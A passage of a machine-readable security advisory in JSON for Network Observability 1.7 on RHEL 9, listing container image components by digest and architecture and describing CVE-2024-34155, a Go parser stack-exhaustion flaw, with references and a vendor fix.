"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64"
},
"product_reference": "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x"
},
"product_reference": "network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le"
},
"product_reference": "network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64"
},
"product_reference": "network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64"
},
"product_reference": "network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x"
},
"product_reference": "network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le"
},
"product_reference": "network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64"
},
"product_reference": "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64"
},
"product_reference": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64"
},
"product_reference": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x"
},
"product_reference": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le"
},
"product_reference": "network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64"
},
"product_reference": "network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64"
},
"product_reference": "network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x"
},
"product_reference": "network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le"
},
"product_reference": "network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64"
},
"product_reference": "network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x"
},
"product_reference": "network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64 as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64"
},
"product_reference": "network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le as a component of NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
},
"product_reference": "network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le",
"relates_to_product_reference": "9Base-NETWORK-OBSERVABILITY-1.7.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-34155",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"discovery_date": "2024-09-06T21:20:06.929766+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310527"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the go/parser package of the Golang standard library. Calling any Parse functions on Go source code containing deeply nested literals can cause a panic due to stack exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34155"
},
{
"category": "external",
"summary": "RHBZ#2310527",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310527"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34155",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34155"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34155",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34155"
},
{
"category": "external",
"summary": "https://go.dev/cl/611238",
"url": "https://go.dev/cl/611238"
},
{
"category": "external",
"summary": "https://go.dev/issue/69138",
"url": "https://go.dev/issue/69138"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk",
"url": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-3105",
"url": "https://pkg.go.dev/vuln/GO-2024-3105"
}
],
"release_date": "2024-09-06T21:15:11.947000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
